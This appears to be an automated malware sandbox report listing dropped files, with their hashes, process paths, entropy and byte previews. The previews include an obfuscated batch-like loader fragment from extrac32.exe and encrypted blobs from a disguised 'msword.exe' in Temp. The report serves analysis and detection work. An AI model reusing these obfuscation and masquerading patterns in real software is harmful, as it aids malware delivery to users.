                                                                  SSDEEP:384:b5EawfiYUKjpwVHqyl4PS5Riya68+DsfBL6pbHuwBl60YuyoVDKK3utLK5u+u0EC:bGawfr9Yxbriya68+YQZHuoE0Yxo73e+
                                                                  MD5:9EF6EFA272560F1DEE8923508DAFE2C9
                                                                  SHA1:7E6572FA616E8FE8AB67D2518F8685EB01F46923
                                                                  SHA-256:3B887BAB036D30A1A4FB5C2C6B828F5EF3D8D5C1FF8D4147ED647ACB51AC808A
                                                                  SHA-512:D17464F391FFC0CDB60D5A5669779343C4363130BC31E3902512ECEB5A139454992C00D1D8A9AA5D0BF142B904059E5F90A8804A1D2406FF398D893EA5804CF4
                                                                  Malicious:false
                                                                  Preview:Set Plug=4..ZQrEf-Bdsm-Janet-Dans-Genres-Census-Strips-Japan-Arrest-..wCAHostels-Incentives-Resolutions-Cave-Prefix-..QbtFancy-Biodiversity-..zLPetite-Holdem-Pam-Francis-Exchange-..CDeOffers-..iQSi-Sexuality-Sisters-..mTSPsychological-Changes-..ZhUgItself-Reverse-..MFVChips-Universities-..pyGMExample-Duncan-Vermont-Literally-Eh-Corresponding-..Set Catherine=9..QdHDivided-Onion-Treatment-Dan-..AtzaAttorneys-Participation-Miracle-Divine-Strongly-..YoRepeat-..TxVSFun-Counted-Transport-Miss-Settle-Receptors-Vulnerable-Distinguished-..yrpZStood-Isp-Supplies-Punch-Wayne-Ventures-..VcHas-Personalized-Encouraging-Thereof-..xkqAsthma-Campaigns-Taxi-Info-..KsJfRequirements-Cam-Says-Coast-Geo-..Set Diagnosis=J..KuSteering-Micro-Louisiana-Sur-..WnmrCorn-Producer-Perfume-Units-Releases-..LCCulture-Corruption-Wives-Departments-Hd-Autos-Electoral-Knowing-Hardwood-..WGNiBoolean-..lRrCPortraits-Desktops-Monthly-Weather-Fioricet-Targets-Conditions-Fox-R-..GMCenturies-Suit-Exchange-Buck-Sep-Inn-Hugo-As-R
                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):43912
                                                                  Entropy (8bit):7.0754478586730984
                                                                  Encrypted:false
                                                                  SSDEEP:768:tBGmd9OTGQ1Dv7sMvLHfR/ZByLiFuO/ChgZ45VatJVEV3GPkjF:tBGmdATGODv7xvTphAiPChgZ2kOE6
                                                                  MD5:28E6332970BFF06A0431BFEFBCD59462
                                                                  SHA1:20902CDBF1A8D4DC081ADB967692C0C4ADD030BC
                                                                  SHA-256:85C250563E37692A5A0188EAC2EE3E27D6A7DAB102E0200DF20D027B33DE8E91
                                                                  SHA-512:CB1FB1F5A97E6A4F790D61E6964FFA4967591946DC03C639E944455DE893070547DA9B5401952DD5FA93FF66CF5F66F7A15F04913C41F4514A7DE067C8E6F60C
                                                                  Malicious:false
                                                                  Preview:..].........`...]...]...]...........0................]...]...]...]...]...]...]...]....................................p...]...]...]...]...p...................................................................................................0.........................0......................................................................................00......h..... ....................(.....00............ ....................h........... .A?....00.... ..%.... .... ............. .h...........(....... ...................................z`..y_..M,..6...).......,...:...nnn.jb..ZF..F).._@..9...eee..................................................................................................................................................................7............................................(.........(....... ...................................z`..y_..M,..6...).......,...:...nnn.jb..ZF..F).._@..9...eee.................................................................
                                                                  Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):42495
                                                                  Entropy (8bit):7.994847286020057
                                                                  Encrypted:true
                                                                  SSDEEP:768:0SLfZMdEvp3jxmff02Y0Vo91+u08R48OcPk4h+ZnWlJcCQbem8OU3VOmWZ:bZg02tV21q1P4h3wHAFOmWZ
                                                                  MD5:062E20D07FE052044D9339A8B3F1CB38
                                                                  SHA1:5428326E6D395EEBABEB3FFB1972AE6A8C3DA8AE
                                                                  SHA-256:84DB270DF2972367E799A4F919E5033475A5395B9AD59F50456E340A980B693A
                                                                  SHA-512:2EE25F17BB5BE528ABD2CE9FE4877BFA58B2D30A9503D22B31DD16C80A7B248D14142AAB42ACFFD0A069975490CF370435310E08187311365136680657D3BDF1
                                                                  Malicious:false
                                                                  Preview:.M<..l.v.;. FB.4.h{..I.....jo_..~6s..7..bM.}..V.&.o_Y..k..`.x..q...H....6u.`T."....t.v..D.d\tv..J............{.'....S..)..u.nCb.>.0g.uh'.A4.&#o..J..w...g.......eh.K.z...D)78.6.H.S..aP.]...|.....f...zDnlM3.......G\.M...3T..Ow.....z-3...Z,..L...k.\@....43.....j... .$r0H........+.....}..o#.h....t.L.U.X.).t....]&..@...I..".it...4..p].F.(,O.".{.>..s-._$...(.%ZKG.o.6xr|....8.Y...%..J.0.I...P....Io.....1;Z.u..uZ.e..Jr....$.I.{.W..l.....d.@C.`+L. .A.}W..d.X.c..)a.&.P.9 Y....R.R...?o..>......GX.D..i.{.m.?>..<..W+..s8.uK....D...H....Vk.la.X...w..D....t..k.HW....OA....~dU|^DC....D..>...{.t8,o....l.q.nXu.]=4...K.@[?wpn..nY...Q...A.$..=@G....J.O..H.~..:i....!...w..*A=".|.z.jcm........4T...o.,...c1~..B....Yz...8.5qu.<....H..&....[.n..3.=...-l6Z..s...i,0......*.T.{r...F.":. .......j.r-j'3.!....=..iE.oJ.^0;....q/z.]..u"I..X..d..m..Z..L...x....<..g.$...s.*......)..[G.......6.".....f.5.@{..!.+j..yf..iz...=...V.d........6...k.uE]6....Q...mV.i.FU.......v.w..
                                                                  Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):58368
                                                                  Entropy (8bit):7.996685518527556
                                                                  Encrypted:true
                                                                  SSDEEP:1536:Kftiu0ideTjMGF6+YCYNRbYPUU1gqE1oe6kWjlu:958eTN6rCeYPz1gMeClu
                                                                  MD5:734A793F9424DE731EEE480B610E0257
                                                                  SHA1:DD2073F71258FC036517ED503B3F85FD8ECDFDA6
                                                                  SHA-256:0915FFDD69CF4511B586769737D54C9FF5B53EDA730ECA7A4C15C5FF709315EC
                                                                  SHA-512:194915FEEFA2E7D04F0683FD5AF0F37FC550F1A8F4883D80D4CE0E4B6E4091BD9049A52E0FB3E5D3DB872B711431E1D5E7800AA206E3B5654DFD1266FB452335
                                                                  Malicious:false
                                                                  Preview:|U.A&..).?.<.`...D0.3.!=H..Id.,....@r...X...{P.@O.^.G..i.N.d.;k.GjcuuwC.h....E%t.Z..:...T:.s"..',...<.."(._.zk`..|.U...*......L]....{.:.4.....z.!...<..m.3.3..lK..E.u..-..#S.l8.F.G....*.B .h.v..99.6P;..a..O.T..eK...q.j:.4...F\B>c.>r{...4..&U......./.qH...@..U..>...6.B...(d.8......`.L.N......r4.e...fp..X.....w....[K.g.|....om.,.z.Q...fdC..s..n.h...{F.h...,.j].z..?.^.Y.::.-+8....}W.....m..h.Q..Vo..1.g....M......i...R.v3.i29jdc...3\[:..r@.TbPN....pL..Xc.6/T..v..n_..0[........o....TE.`S...N....Kj6hamK...o.0_.H$..... .!a..?u.;.=..C..xp..[.s........O..b.H|....96h..V....??%......9.8.)..*.4L..J..R...9%..O.'..O= a.6..K.o.......}..F....M5e.....8.p.....kqq...eL.u%.....6.66M'n.Uz.....(...?vz.,.2VB'.....:h.#o.8..~..@.6.?m..5.....8....pFX$..M8.%q......`s...y.Nudh.........R...9W[..>%.6O.X.....G.....@...$../.<j.t2.O@r..x.{._.....c!....d%.".y....I.8I./........'q.F....@.+..h..c....j.x.m..M.q.).].c......q.o...ahn..c.-a......Y..+^.G....@.8.....;H..X..t
                                                                  Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):67584
                                                                  Entropy (8bit):7.996945320826708
                                                                  Encrypted:true
                                                                  SSDEEP:1536:9bqjXKdCr6Qw/ljXmAZUNbHaQPc0osgAuB6mrQjh4GVnY4t8PwMU:9OadCretrniNX1osgAGrQh4GVY4ePwMU
                                                                  MD5:10CF860D6ED7F8B77D7F02A407DDDE2C
                                                                  SHA1:42C54FF8B32BD09B583E544837A65248AF7B60AB
                                                                  SHA-256:A4E09DE3E94F24B4D2D780667569166F242486A7912706A58AB32CF88F547069
                                                                  SHA-512:355179700261EE76D67CEFCC27A120CA636278636420DF8D5CCE965055CC05F5249F86230A4C1695FCD3DB4A9B91CFD0D1AF5E6723F3A9B396DB1F4B70EC0052
                                                                  Malicious:false
                                                                  Preview:>.m....\qG..........h......y(..].....b8.Bt>f)iW/m..'...=.~Z......?......n.'..1M..w.D.9. .u.y.Ta+...$..Q.v..8........O..X..K.W.....x.".E.."g....9.fk.#.=.....:.OB..7..Tf.4...1AK..}..Y..?..)...V..Jr.v...9...!.2..i.B.!....ji..&.e...Q...*;..k..U11.ov..I.....{q.\.T&.#..r.9.(v-r../....}.T......f..J..%.|u...A..&...S[s....4.j$P..PV..M..s.739$...}..W{.f..&....A..h.....Ye.v......!.+.F.E.1.e...c.....i....D..n.&..g.d....Hx\....b.......N..0.^..O...@j....'..Z.~......w}....g...c....V..b......t..%.....].`@e.`...._......vX.A._....?...Pp.DG.7m.R..4G3@....uy...;L'..II{*....M...Fv.[..<.Vm".....P.w.\......%.kY.^.L[..h.s..`..E.>....g..^.. 8.*..#.[HY@.8.......N.7...m....T...<."}H..3.!.9N$..,.bF.@.......nkP.8.R.-J.~K..<.,...f.vL..........YPA...LHl5\..H....c..G."h..s..X..X.......8...U....,..s`.i......E...o.C'.&+.Lb.&......[t1..>..`t......&`CE.9=..m4..3f|.Y@X..,.u.C.o~....L.E....2.K..}..*;....e....w...U...L...7#.|..`5g.x<....../.]^.j.,y.#W.....B\.y
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):1688
                                                                  Entropy (8bit):5.440222955117128
                                                                  Encrypted:false
                                                                  SSDEEP:48:5WSU4Yymp+ms4RIoU99tK8NWR8PSNhXR908dyK:5LHYvVsIfA2KWEkS8EK
                                                                  MD5:817699EF517453F9AA12C432A956FFEC
                                                                  SHA1:63175FDE82E9438679D498A8891A9342BF61F181
                                                                  SHA-256:852B9571EE25C27421DBA952D3B4DA39D1730BBD11D9918FF9179F91B5A31D71
                                                                  SHA-512:62EADC2330D2E3FD5C540D63134016D6BC41A9D9371E89E86661067039C76F7DE38E84E7F24882A238A46115A63123EAA082350FA83BA7903D059527A1584EF3
                                                                  Malicious:false
                                                                  Preview:@...e...........>...............................................P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):246
                                                                  Entropy (8bit):3.511206980872271
                                                                  Encrypted:false
                                                                  SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8yQpClE3Gl1lww:Qw946cPbiOxDlbYnuRKTWD3Gl1H
                                                                  MD5:625D5A93B9FEDFC3689FA05FD1434068
                                                                  SHA1:20A36A04ED271C51920F6227C43A53CA25FE81E8
                                                                  SHA-256:DE343CC27FC02783FCAE4B87106E54A7CE1DEEA820C03D7DF6A59D00C84E6D77
                                                                  SHA-512:1AE0010977FCB85E515935819887FBA581CF8C564CE52A637F383B62844D4F07CD0361B693C6BDED41F690BA059AE38D9E24B1969802CCA3D075FECD7B05C7B5
                                                                  Malicious:false
                                                                  Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.7./.0.1./.2.0.2.5. . .1.2.:.1.3.:.0.9. .=.=.=.....
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:ASCII text, with very long lines (393)
                                                                  Category:dropped
                                                                  Size (bytes):16525
                                                                  Entropy (8bit):5.345946398610936
                                                                  Encrypted:false
                                                                  SSDEEP:384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
                                                                  MD5:8947C10F5AB6CFFFAE64BCA79B5A0BE3
                                                                  SHA1:70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
                                                                  SHA-256:4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
                                                                  SHA-512:B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
                                                                  Malicious:false
                                                                  Preview:SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):15114
                                                                  Entropy (8bit):5.370255401617607
                                                                  Encrypted:false
                                                                  SSDEEP:384:9mj2TTCsgNWcTm8mLMjc9D90sH98fhJaDgnJjbp3DehbxmVMkn91qhqXuB/ntFV/:zR//Lp9Qk
                                                                  MD5:5B8485C15D7A011C1D596440D632DFF1
                                                                  SHA1:4E4A7A0D7CCFC4BE2AF238B217035CE238008263
                                                                  SHA-256:E0750EDA7DB5FBAF3E93F6887B36CA621EF17366CEE8BDD5820931F5C8E2DAAD
                                                                  SHA-512:8FD019269DCFC16BD9A059F71832EC8747E96E4456CC3E77106EE20556436A338F711D996836330E5D6095417F685EAEC8463819E78E6E1B89017F6350254909
                                                                  Malicious:false
                                                                  Preview:SessionID=5fc7bca0-c495-4bac-87d2-f55afd0e094d.1736269984320 Timestamp=2025-01-07T12:13:04:320-0500 ThreadID=7312 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=5fc7bca0-c495-4bac-87d2-f55afd0e094d.1736269984320 Timestamp=2025-01-07T12:13:04:332-0500 ThreadID=7312 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=5fc7bca0-c495-4bac-87d2-f55afd0e094d.1736269984320 Timestamp=2025-01-07T12:13:04:333-0500 ThreadID=7312 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=5fc7bca0-c495-4bac-87d2-f55afd0e094d.1736269984320 Timestamp=2025-01-07T12:13:04:333-0500 ThreadID=7312 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=5fc7bca0-c495-4bac-87d2-f55afd0e094d.1736269984320 Timestamp=2025-01-07T12:13:04:333-0500 ThreadID=7312 Component=ngl-lib_NglAppLib Description="SetConf
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):29752
                                                                  Entropy (8bit):5.388358145130854
                                                                  Encrypted:false
                                                                  SSDEEP:768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2r5:F
                                                                  MD5:D4E8FE8651B5E1D0A7A6A800D4DFDD25
                                                                  SHA1:0443101F8B1E00AE7EA432643F6EBEA808ED0C08
                                                                  SHA-256:A40531A4F32262A79DD189AC18D2C73BBA6CBC6DA2662BF4D6F7C1B2C7B75C8E
                                                                  SHA-512:CEA568BAB49843F54E0BB80CDE212D36C8F33C2C541715F894C58EC5F405E6F00AA6DEDC85092EB0FE987D5EBEBF82AE4ED24A96163F1967C25356A900BCA4DD
                                                                  Malicious:false
                                                                  Preview:03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                  Category:dropped
                                                                  Size (bytes):1407294
                                                                  Entropy (8bit):7.97605879016224
                                                                  Encrypted:false
                                                                  SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                                  MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                                  SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                                  SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                                  SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                                  Malicious:false
                                                                  Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                  Category:dropped
                                                                  Size (bytes):758601
                                                                  Entropy (8bit):7.98639316555857
                                                                  Encrypted:false
                                                                  SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                  MD5:3A49135134665364308390AC398006F1
                                                                  SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                  SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                  SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                  Malicious:false
